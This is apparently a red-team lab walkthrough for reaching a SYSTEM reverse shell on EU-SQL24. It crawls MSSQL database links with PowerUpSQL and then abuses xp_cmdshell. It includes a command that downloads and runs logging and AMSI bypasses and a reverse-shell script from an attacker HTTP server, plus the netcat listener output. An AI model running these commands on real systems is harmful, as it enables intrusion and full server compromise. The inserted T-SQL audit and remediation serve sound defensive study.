Task
Get a reverse shell on a SQL server in the eurocorp forest by abusing database links from dcorp-mssql.
First, enumerate the SQL servers in the domain and check whether the student user has privileges to connect to any of them. Run Invishell and use PowerUpSQL for the enumeration.
PS C:\Users\student372> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1
# Look for SPNs that start with MSSQL*
PS C:\Users\student372> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Since we can connect to dcorp-mssql, we can use Get-SQLServerLinkCrawl to crawl the database links automatically.
PS C:\Users\student372> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose
VERBOSE: Server: EU-SQL24
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL24.EU.EUROCORP.LOCAL
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:
The crawl reaches EU-SQL24 through the link chain with the sa login, so we have sysadmin on the EU-SQL24 server.
If xp_cmdshell is enabled, it is possible to execute commands on EU-SQL24.
To avoid dealing with a large number of quotes and escapes, use the following command:
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'"
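The crawl above works because each hop's link is mapped to a fixed sysadmin remote login (sa) and the final server allows xp_cmdshell. The following T-SQL audit is an added defender-side example, not part of the original lab or PowerUpSQL: run as sysadmin on each instance in the chain, it lists every linked server with its login mapping and RPC settings, reports whether xp_cmdshell is enabled, and shows the corresponding remediation. The server names in the comments are only those the crawl output reports; the linked-server placeholder in the remediation section is an assumption to be filled in after review.

```sql
-- Added defender-side audit; not part of the original walkthrough.
-- Run as a sysadmin on each instance the crawl touched
-- (DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL24 in the output above).

-- 1. Linked servers and their login mappings.
--    A fixed remote login of 'sa' (uses_self_credential = 0) on a link with
--    'rpc out' enabled is exactly what lets a crawl pivot as sysadmin.
SELECT  s.name                                 AS linked_server,
        s.data_source,
        s.is_rpc_out_enabled,                  -- needed for EXEC ... AT <server>
        s.is_data_access_enabled,              -- needed for OPENQUERY
        COALESCE(sp.name, N'<all logins>')     AS local_login,  -- principal 0 = default mapping
        ll.uses_self_credential,               -- 1 = pass caller through, 0 = fixed remote login
        ll.remote_name                         -- the fixed remote login, e.g. 'sa'
FROM    sys.servers          AS s
JOIN    sys.linked_logins    AS ll ON ll.server_id   = s.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = ll.local_principal_id
WHERE   s.is_linked = 1
ORDER BY s.name, local_login;

-- 2. Is xp_cmdshell enabled on this instance?
--    value_in_use = 1 means OS commands run as the SQL Server service account
--    (SYSTEM in the shell captured on EU-SQL24 above).
SELECT  name, value, value_in_use
FROM    sys.configurations
WHERE   name IN (N'xp_cmdshell', N'show advanced options');

-- 3. Remediation for the findings above. '<linked server>' is a placeholder;
--    uncomment and fill in after reviewing which links the application really needs.
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0;          RECONFIGURE;
-- EXEC sp_serveroption @server = N'<linked server>', @optname = N'rpc out', @optvalue = N'false';
-- -- Replace the catch-all fixed-sa mapping with a pass-through mapping so remote
-- -- access is limited to what the calling login already has on the remote side.
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'<linked server>', @locallogin = NULL;
-- EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'<linked server>', @useself = N'true';
```

The first query is the one to read top to bottom along the crawl path: any row with uses_self_credential = 0, remote_name = sa and is_rpc_out_enabled = 1 is a hop an attacker can cross with sysadmin regardless of who they are on the source server.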
To get a reverse shell, we'll use Invoke-PowerShellTcpEx.ps1
Create a copy of Invoke-PowerShellTcpEx.ps1 and rename it to Invoke-PowerShellTcpEx1.ps1.
Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file.
Host the files on the attacker's HTTP server and start a listener using netcat.
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.72/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql24
On Listener:
C:\Users\student372>cd C:\AD\Tools\netcat-win32-1.12\
C:\AD\Tools\netcat-win32-1.12>nc64.exe -lvnp 443
listening on [any] 443 ...
connect to [172.16.100.72] from (UNKNOWN) [172.16.15.17] 56942
Windows PowerShell running as user SYSTEM on EU-SQL24
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>